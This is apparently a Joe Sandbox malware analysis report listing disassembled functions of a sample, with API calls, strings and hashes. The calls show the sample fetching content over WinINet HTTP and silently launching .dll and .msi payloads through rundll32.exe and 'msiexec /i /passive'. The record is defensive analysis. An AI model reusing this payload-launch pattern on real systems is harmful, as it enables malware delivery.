Instruction Fuzzy Hash: 97E12271900108ABDB48EBA4DC95FEE7778FF15300F444169F507E6991EF346A4ACB62

Function 008A9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008A906C

Strings

image/jpeg, xrefs: 008A9136

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: a71cfd8fcf18ea48ae792320d5bf3e5c38581625aefba9d90c899ee750b8f685
Instruction ID: 324565a25dc6c8ed155316e4b669b8d529e41ab1dc1dac7a64525acee73510db
Opcode Fuzzy Hash: a71cfd8fcf18ea48ae792320d5bf3e5c38581625aefba9d90c899ee750b8f685
Instruction Fuzzy Hash: 3871EAB1A10208ABDB04EFE4DD89FEEB7B8FB58700F148509F516E7290DB34A905CB61

Function 6C6AD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6AD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD52A
GetCurrentThreadId.KERNEL32 ref: 6C6AD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD55F
free.MOZGLUE(00000000), ref: 6C6AD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6AD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6AD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD652
GetCurrentThreadId.KERNEL32 ref: 6C6AD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD6A2

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction ID: 9b8953e07197604a31493b0d65dd3307c99482accd72b78eb2f8161ceeed3414
Opcode Fuzzy Hash: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction Fuzzy Hash: EE516C71604705DFC704DF65C484A9ABBF4FF8A358F108A2EE95A87710DB30B945CB99

Function 008A17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 008A17C5
ExitProcess.KERNEL32 ref: 008A17D1

Strings

block, xrefs: 008A17B7

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 175f0987b55d6e42bb766abe164dde813d9c08cbdd142040a3772ff8b3d89a91
Instruction ID: 7efd890d153203ae25d1f8f049a5ec688f38830a66f573fb960087a91acf6c30
Opcode Fuzzy Hash: 175f0987b55d6e42bb766abe164dde813d9c08cbdd142040a3772ff8b3d89a91
Instruction Fuzzy Hash: E55176B4A00209EBEF14DFA0C858ABE3BB5FB05304F148159E816E7790D774E942DB62

Function 008A2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

ShellExecuteEx.SHELL32(0000003C), ref: 008A31C5
ShellExecuteEx.SHELL32(0000003C), ref: 008A335D
ShellExecuteEx.SHELL32(0000003C), ref: 008A34EA

Strings

"" , xrefs: 008A309A
<, xrefs: 008A3490
/i ", xrefs: 008A33E4
.msi, xrefs: 008A3398
/passive, xrefs: 008A345B
.dll, xrefs: 008A31E5
C:\Windows\system32\rundll32.exe, xrefs: 008A3332
C:\Windows\system32\msiexec.exe, xrefs: 008A34BF

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: b71136e2401aa3e078c70184098a473baf60ced55f5ae928f448e3805fddb0e9
Instruction ID: 2ef185e8f2701092a208990b78ec0f3d1e640a9811f9942b4b1fb1b31d744b66
Opcode Fuzzy Hash: b71136e2401aa3e078c70184098a473baf60ced55f5ae928f448e3805fddb0e9
Instruction Fuzzy Hash: 0F12FE718001089AEB59EB94DC92EEEB738FF15300F544169F507A6991EF386B4ACF63

Function 6C69EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EC8C

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69ECA1
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C69ECC5
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69ED19
CloseHandle.KERNEL32(?), ref: 6C69ED28
free.MOZGLUE(00000000), ref: 6C69ED2F
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C69EC94

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction ID: 2ae2e6adba9c6c1c82c3a60dad5285ffbeb87b2139405902274e78f0153f2d9b
Opcode Fuzzy Hash: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction Fuzzy Hash: 1C21E575600106AFDF009F26DC44A9A3779FF8636DF144210FD1897745DB31A80ACBAE

Function 6C67C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C67C5A3
WideCharToMultiByte.KERNEL32 ref: 6C67C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C67C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C67CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C67CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C67CAA5

Strings

(null), xrefs: 6C67C596
0, xrefs: 6C67D30A

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction ID: ec663ae348d2d7e35e63457b47664be838fc7f850928f8c79191e0fbf81cf5c1
Opcode Fuzzy Hash: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction Fuzzy Hash: 2AA1B230608341AFDB20DF29C59475EBBE1AFC9758F048D2DE99AD3641D731E805CB6A

Function 008A52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 00896280: InternetOpenA.WININET(008B0DFE,00000001,00000000,00000000,00000000), ref: 008962E1
Part of subcall function 00896280: StrCmpCA.SHLWAPI(?,0156E4F0), ref: 00896303
Part of subcall function 00896280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00896335
Part of subcall function 00896280: HttpOpenRequestA.WININET(00000000,GET,?,0156DC98,00000000,00000000,00400100,00000000), ref: 00896385
Part of subcall function 00896280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008963BF
Part of subcall function 00896280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008963D1

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5318
lstrlen.KERNEL32(00000000), ref: 008A532F

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 008A5364
lstrlen.KERNEL32(00000000), ref: 008A5383
lstrlen.KERNEL32(00000000), ref: 008A53AE

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

ERROR, xrefs: 008A530A
ERROR, xrefs: 008A546F
ERROR, xrefs: 008A5432
ERROR, xrefs: 008A53B9
ERROR, xrefs: 008A54A9

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 18392ccb648735d22dc23b88c98ab6b90448c6e2ecba94ebf07cadb4be7fec48
Instruction ID: deecab6c6613c14b08ac899b680ddc8bf1c97473092c036ee44553600e3bc522
Opcode Fuzzy Hash: 18392ccb648735d22dc23b88c98ab6b90448c6e2ecba94ebf07cadb4be7fec48
Instruction Fuzzy Hash: 2A51BA709101489BEB58FF68C996AEE7779FF16301F504028E406DAD91EF386B46CB63

Function 6C653480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C65350E
__Init_thread_footer.LIBCMT ref: 6C653522
__aulldiv.LIBCMT ref: 6C653552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C65357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653592

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

kernel32.dll, xrefs: 6C6534EA
GetSystemTimePreciseAsFileTime, xrefs: 6C653508

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction ID: 9855ab1f5cf0ff1ab9f91fc4aabf033d94efc2b8b54de8244a30b0250912f382
Opcode Fuzzy Hash: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction Fuzzy Hash: 5631B371B012469BDF00DFBAC888AAA77B5FB86745F204429F50193A64DB70B905CF69

Function 6C654480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C694843,?), ref: 6C6545F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C694843,?), ref: 6C65468A
free.MOZGLUE(?,?,?,?,?,?,6C694843,?), ref: 6C6546C9
free.MOZGLUE(?), ref: 6C6546EF
free.MOZGLUE(?), ref: 6C654712
free.MOZGLUE(?), ref: 6C654735
free.MOZGLUE(?), ref: 6C654758
free.MOZGLUE(?), ref: 6C65477B
free.MOZGLUE(?), ref: 6C65479E

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction ID: 5853785377ad7fac109c5e2629cf6a5aa9a57433c8303e5361673e4d80730685
Opcode Fuzzy Hash: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction Fuzzy Hash: E5B1F671A001518FDB188E3CC8D07BD77A1AF42328FA846A9E416DBBC6D7B1D8748B59

Function 008A12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
